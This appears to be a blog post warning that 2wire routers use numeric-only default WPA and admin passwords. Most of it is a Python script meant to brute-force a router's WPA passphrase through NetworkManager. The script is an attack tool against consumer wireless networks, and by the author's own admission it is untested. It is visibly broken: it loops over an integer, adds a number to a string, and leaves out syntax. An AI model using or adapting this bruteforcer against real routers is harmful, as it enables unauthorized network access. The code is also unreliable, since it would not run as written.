2wire WPA Security Vulnerability

Do you use a 2wire modm/router?: Your network could be at risk. The unfortunate matter is that 2wire modems by default use only numbers in it’s generated Password.  Due to this your wireless could be at risk of being compromised as it is rather trivial to write a program that will generate base10 passwords to brute force access to your router. If you have not changed your password since it was installed it would be greatly advised to change the wpa password to something more complex The same is true of the default admin password to the routers backend it is just another string of numbers.

The fact that a company producing wireless hardware would blindly create a password scheme as simple and susceptible to such an easy attack is more than disappointing, that they did it twice is even more so. Generating base10 passphrases is just as bad as the wep protocol granted in this case you don’t have to gather packets and can just directly bruteforce the router with little to no resistance being that there is no idle or block for successive failed login attempts.

The following python example should create a apploication that will effectively bruteforce the login to a 2wire modem, requires networkmanager (Note: may not work as expected I wrote it blind without being on linux and without a python interpreter, the over all idea it represents is correct though)

import dbus
import time

SEEKED_SSID = “2wire123”
SEEKED_PASSPHRASE = “1000000000”

if __name__ == “__main__”:
bus = dbus.SystemBus()
# Obtain handles to manager objects.
manager_bus_object = bus.get_object(“org.freedesktop.NetworkManager”,
“/org/freedesktop/NetworkManager”)
manager = dbus.Interface(manager_bus_object,
“org.freedesktop.NetworkManager”)
manager_props = dbus.Interface(manager_bus_object,
“org.freedesktop.DBus.Properties”)

# Enable Wireless. If Wireless is already enabled, this does nothing.
was_wifi_enabled = manager_props.Get(“org.freedesktop.NetworkManager”,
“WirelessEnabled”)
if not was_wifi_enabled:
print “Enabling WiFi and sleeping for 10 seconds …”
manager_props.Set(“org.freedesktop.NetworkManager”, “WirelessEnabled”,
True)
# Give the WiFi adapter some time to scan for APs. This is absolutely
# the wrong way to do it, and the program should listen for
# AccessPointAdded() signals, but it will do.
time.sleep(10)

# Get path to the ‘wlan0’ device. If you’re uncertain whether your WiFi
# device is wlan0 or something else, you may utilize manager.GetDevices()
# method to obtain a list of all devices, and then iterate over these
# devices to check if DeviceType property equals NM_DEVICE_TYPE_WIFI (2).
device_path = manager.GetDeviceByIpIface(“wlan0”)
print “wlan0 path: “, device_path

# Connect to the device’s Wireless interface and obtain list of access
# points.
device = dbus.Interface(bus.get_object(“org.freedesktop.NetworkManager”,
device_path),
“org.freedesktop.NetworkManager.Device.Wireless”)
accesspoints_paths_list = device.GetAccessPoints()

# Identify our access point. We do this by comparing our desired SSID
# to the SSID reported by the AP.
our_ap_path = None
for ap_path in accesspoints_paths_list:
ap_props = dbus.Interface(
bus.get_object(“org.freedesktop.NetworkManager”, ap_path),
“org.freedesktop.DBus.Properties”)
ap_ssid = ap_props.Get(“org.freedesktop.NetworkManager.AccessPoint”,
“Ssid”)
# Returned SSID is a list of ASCII values. Let’s convert it to a proper
# string.
str_ap_ssid = “”.join(chr(i) for i in ap_ssid)
print ap_path, “: SSID =”, str_ap_ssid
if str_ap_ssid == SEEKED_SSID:
our_ap_path = ap_path
break

if not our_ap_path:
print “AP not found :(”
exit(2)
print “Our AP: “, our_ap_path

 

for connections in 9999999999:

SEEKED_PASSPHRASE += 1
connection_params = {
“802-11-wireless”: {
“security”: “802-11-wireless-security”,
},
“802-11-wireless-security”: {
“key-mgmt”: “wpa-psk”,
“psk”: SEEKED_PASSPHRASE
},
}

# At this point we have all the data we need. Let’s prepare our connection
# parameters so that we can tell the NetworkManager what is the passphrase.

# Establish the connection.

settings_path, connection_path = manager.AddAndActivateConnection(
connection_params, device_path, our_ap_path)
print “settings_path =”, settings_path
print “connection_path =”, connection_path

# Wait until connection is established. This may take a few seconds.
NM_ACTIVE_CONNECTION_STATE_ACTIVATED = 2
print “””Waiting for connection to reach “”” \
“””NM_ACTIVE_CONNECTION_STATE_ACTIVATED state …”””
connection_props = dbus.Interface(
bus.get_object(“org.freedesktop.NetworkManager”, connection_path),
“org.freedesktop.DBus.Properties”)
state = 0

if SEEKED_PASSPHRASE >= “9999999999”
print “Something has gone wrong”
break
while True:
# Loop forever until desired state is detected.
#
# A timeout should be implemented here, otherwise the program will
# get stuck if connection fails.
#
# IF PASSWORD IS BAD, NETWORK MANAGER WILL DISPLAY A QUERY DIALOG!
# This is something that should be avoided, but I don’t know how, yet.
#
# Also, if connection is disconnected at this point, the Get()
# method will raise an org.freedesktop.DBus.Error.UnknownMethod
# exception. This should also be anticipated.
state = connection_props.Get(
“org.freedesktop.NetworkManager.Connection.Active”, “State”)
if state == NM_ACTIVE_CONNECTION_STATE_ACTIVATED:
break
time.sleep(0.001)
print “Connection established!”+ str(SEEK_PASSPHRASE)
print “password is: ”

#
# Connection is established. Do whatever is necessary.
# …
#
print “Sleeping for 5 seconds …”
time.sleep(5)
print “Disconnecting …”

# Clean up: disconnect and delete connection settings. If program crashes
# before this point is reached then connection settings will be stored
# forever.
# Some pre-init cleanup feature should be devised to deal with this problem,
# but this is an issue for another topic.
manager.DeactivateConnection(connection_path)
settings = dbus.Interface(
bus.get_object(“org.freedesktop.NetworkManager”, settings_path),
“org.freedesktop.NetworkManager.Settings.Connection”)
settings.Delete()

# Disable Wireless (optional step)
if not was_wifi_enabled:
manager_props.Set(“org.freedesktop.NetworkManager”, “WirelessEnabled”,
False)
print “DONE!”

Popular Posts
  • No Popular Post Available